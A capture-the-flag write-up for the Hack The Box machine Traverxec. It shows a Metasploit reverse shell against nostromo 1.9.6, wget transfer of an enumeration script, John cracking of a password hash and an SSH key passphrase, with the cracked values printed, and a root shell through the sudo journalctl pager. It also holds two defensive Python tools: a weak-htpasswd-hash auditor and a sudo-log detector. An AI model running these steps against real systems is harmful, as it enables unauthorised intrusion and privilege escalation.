Traverxec

Traverxec is an easy-difficulty Linux machine that's a good introduction to web-to-host exploitation as well as SSH usage.

Recon

We start off by scanning Traverxec's IP 10.10.10.165 with nmap:

nmap -T4 -A -v 10.10.10.165

From our results we get the following ports and services:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Right off we see that it's only running 2 services, and we potentially have the web server's service name and version: nostromo 1.9.6.

We can use searchsploit to check if there are any existing exploits for nostromo v1.9.6 with searchsploit nostromo:

----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                               |  Path
                                                                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                                                         | exploits/multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                                                       | exploits/multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                                                         | exploits/linux/remote/35466.sh
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Perfect, we find that there's an RCE exploit for this version of nostromo.

Now let's fire up Metasploit Framework with msfconsole and search for the exploit with search nostromo:

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

Perfect! msf has the exploit we want to use, now let's select and configure it.

Exploit

use exploit/multi/http/nostromo_code_exec
set LHOST tun0
set RHOST 10.10.10.165
set RPORT 80
run

After a few seconds we should get the following:

[*] Started reverse TCP handler on 10.10.15.64:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.64:4444 -> 10.10.10.165:59272) at 2020-04-11 02:34:42 -0700

Great! We have a shell. Unfortunately it's a limited shell, but we can fix that up by upgrading it to a full PTY shell with python -c 'import pty; pty.spawn("/bin/bash")'

Now with a full shell let's enumerate some more. Seeing as we only have a low-privilege shell right now, we need to get user. To do this we will get LinEnum: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Once we have it, it's time to get it onto the victim. To do this we'll fire up python -m SimpleHTTPServer locally, and on the victim we'll run wget http://IP:PORT/LinEnum.sh. Once it's there we need to set its permissions with chmod +x LinEnum.sh and then run it with ./LinEnum.sh

Upon completion we find one line that stands out:

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

We got a password hash! Coming back to our local machine, we'll put that hash into a file and run it through John:

touch hash
nano hash
john --wordlist=/root/Downloads/Dic/rockyou.txt hash
Nowonly4me       (david)

Upon completion we get the password Nowonly4me.
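The hash cracked in seconds because nostromo's .htpasswd stores it as MD5-crypt ($1$), a fast hash. As an added defender-side example (not part of the box or of nostromo), here is a small auditor that classifies every hash scheme in an htpasswd file and flags the ones a wordlist run will chew through; the sample content is constructed from the line LinEnum reported plus a made-up bcrypt row.

```python
import re

# prefix -> (scheme name, weak?). MD5-crypt, Apache MD5, SHA1 and DES crypt are
# fast hashes that a rockyou wordlist run cracks in minutes, as happened here;
# bcrypt is the only htpasswd scheme that is deliberately slow.
SCHEMES = [
    ("$2y$", "bcrypt", False), ("$2a$", "bcrypt", False), ("$2b$", "bcrypt", False),
    ("$apr1$", "apache-md5", True),
    ("$1$", "md5-crypt", True),
    ("{SHA}", "sha1", True),
]

def classify(hash_field):
    """Return (scheme, weak) for one htpasswd hash field."""
    for prefix, name, weak in SCHEMES:
        if hash_field.startswith(prefix):
            return name, weak
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hash_field):
        return "des-crypt", True        # traditional crypt(3), no prefix
    return "unknown", True

def audit_htpasswd(text):
    """Parse htpasswd content; return [(line_no, user, scheme, weak), ...]."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep or not user:
            findings.append((line_no, None, "malformed", True))
            continue
        findings.append((line_no, user) + classify(hash_field))
    return findings

def weak_users(text):
    """Usernames whose hashes should be re-set with a slow scheme (htpasswd -B)."""
    return [user for _, user, _, weak in audit_htpasswd(text) if weak and user]

# Constructed sample: the entry LinEnum reported on this box plus a bcrypt row
# (the bcrypt string is a made-up placeholder; only its prefix matters here).
SAMPLE = """\
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
ops:$2y$10$placeholderplaceholderplaceholderplaceholderplacehol
"""

if __name__ == "__main__":
    for line_no, user, scheme, weak in audit_htpasswd(SAMPLE):
        print(f"line {line_no}: {user} uses {scheme}{' (WEAK)' if weak else ''}")
```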

We also see that /home/david/public_www contains a folder protected-file-area which is protected by .htaccess. Checking the nostromo documentation http://www.nazgul.ch/dev/nostromo_man.html we see that there is yet another directory we can access, ~david. Trying to access this directory gives us the following page.

Doesn't look very interesting, does it? Well, typing in the URL 10.10.10.165/~david/protected-file-area gives us an auth screen, and we already have the credentials for it: david:Nowonly4me. It takes us to an index page where we can download backup-ssh-identity-files.tgz.

Once downloaded we can extract the SSH keys; it gives us the following files:

/david/.ssh/
/david/.ssh/authorized_keys
/david/.ssh/id_rsa
/david/.ssh/id_rsa.pub

Unfortunately the id_rsa is encrypted, but luckily we can pass it through John:

python /usr/share/john/ssh2john.py ~/HTB/Traverexec/home/david/.ssh/id_rsa > ~/HTB/Traverexec/ssh.txt
john ssh.txt --wordlist=~/Downloads/Dic/rockyou.txt
hunter           (/root/HTB/Traverexec/home/david/.ssh/id_rsa)

Great! We got the passphrase hunter, and we can now use it with id_rsa to connect via SSH:

ssh -i id_rsa david@10.10.10.165

And with that we have user!

Post Exploitation

Checking David's home dir we find:

david@traverxec:~/bin$ ls -ahlrs
total 16K
4.0K -rwx------ 1 david david  363 Oct 25 16:26 server-stats.sh
4.0K -r-------- 1 david david  802 Oct 25 16:26 server-stats.head
4.0K drwx--x--x 5 david david 4.0K Oct 25 17:02 ..
4.0K drwx------ 2 david david 4.0K Oct 25 16:26 .

server-stats.head gives us a banner, not much use, however checking server-stats.sh we get the following:

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line, /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat, shows us that journalctl is being run as root via sudo, so can we exploit this?

Yes we can! Checking GTFOBins https://gtfobins.github.io/gtfobins/journalctl/ we find that simply typing !/bin/sh from within journalctl's pager can give us root access! So we run /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed
Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list
!/bin/sh

root@traverexec:/home/david/bin# cd /root/
root@traverexec:~# cat root.txt
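The journal lines above are also what a defender has to work with: two sudo attempts by www-data from the web shell, followed by david running journalctl under sudo without --no-pager. As an added example (not part of the box or of any tool on it), this parser turns syslog-style sudo records into dicts and raises an alert for both patterns; the sample lines are a constructed copy of the journal output above plus one made-up line for david's call, and SERVICE_ACCOUNTS and PAGER_COMMANDS are assumptions to tune per host.

```python
import re

# Assumption: accounts that should never invoke sudo on a web host.
SERVICE_ACCOUNTS = {"www-data", "nobody", "apache", "nginx", "nostromo"}
# Commands that hand control to a pager unless told not to (the GTFOBins case above).
PAGER_COMMANDS = ("/usr/bin/journalctl", "/bin/journalctl")

SUDO_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo\[(?P<pid>\d+)\]: (?P<rest>.*)$")

def parse_sudo_line(line):
    """Turn one syslog-style sudo line into a dict, or None if it is not from sudo."""
    m = SUDO_RE.match(line)
    if not m:
        return None
    rec = {"ts": m["ts"], "host": m["host"], "pid": int(m["pid"]), "user": None, "msg": ""}
    user, sep, remainder = m["rest"].partition(" : ")
    if not sep:                       # PAM diagnostics carry no user/command record
        rec["msg"] = m["rest"]
        return rec
    rec["user"] = user
    for part in remainder.split(" ; "):
        key, eq, val = part.partition("=")
        if eq:
            rec[key] = val            # TTY=, PWD=, USER=, COMMAND=
        else:
            rec["msg"] = part         # e.g. "command not allowed"
    return rec

def detect(lines):
    """Return (ts, pid, user, reason) alerts for the given log lines."""
    alerts = []
    for rec in filter(None, map(parse_sudo_line, lines)):
        user, cmd = rec["user"], rec.get("COMMAND", "")
        if user in SERVICE_ACCOUNTS:
            alerts.append((rec["ts"], rec["pid"], user, "service account ran sudo from "
                           f"PWD={rec.get('PWD')} TTY={rec.get('TTY')}: {rec['msg'] or cmd}"))
        elif user and cmd.startswith(PAGER_COMMANDS) and "--no-pager" not in cmd:
            alerts.append((rec["ts"], rec["pid"], user,
                           "sudo journalctl without --no-pager: the pager runs as root"))
    return alerts

# Constructed sample: the five journal lines shown above plus one made-up line
# for david's own sudo call, in the format sudo logs for an allowed command.
SAMPLE_LINES = [
    "Apr 24 01:05:26 traverxec sudo[807]: pam_unix(sudo:auth): auth could not identify password for [www-data]",
    "Apr 24 01:05:26 traverxec sudo[807]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list",
    "Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): conversation failed",
    "Apr 24 01:48:40 traverxec sudo[1574]: pam_unix(sudo:auth): auth could not identify password for [www-data]",
    "Apr 24 01:48:40 traverxec sudo[1574]: www-data : command not allowed ; TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=list",
    "Apr 24 01:50:12 traverxec sudo[1601]: david : TTY=pts/0 ; PWD=/home/david/bin ; USER=root ; COMMAND=/usr/bin/journalctl -n5 -unostromo.service",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES):
        print(*alert)
```

The same rules apply to lines from /var/log/auth.log; the fix for the pager case is a sudoers entry that pins the command to journalctl with --no-pager, so the script's | cat is no longer the only thing standing between the pager and a root shell.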
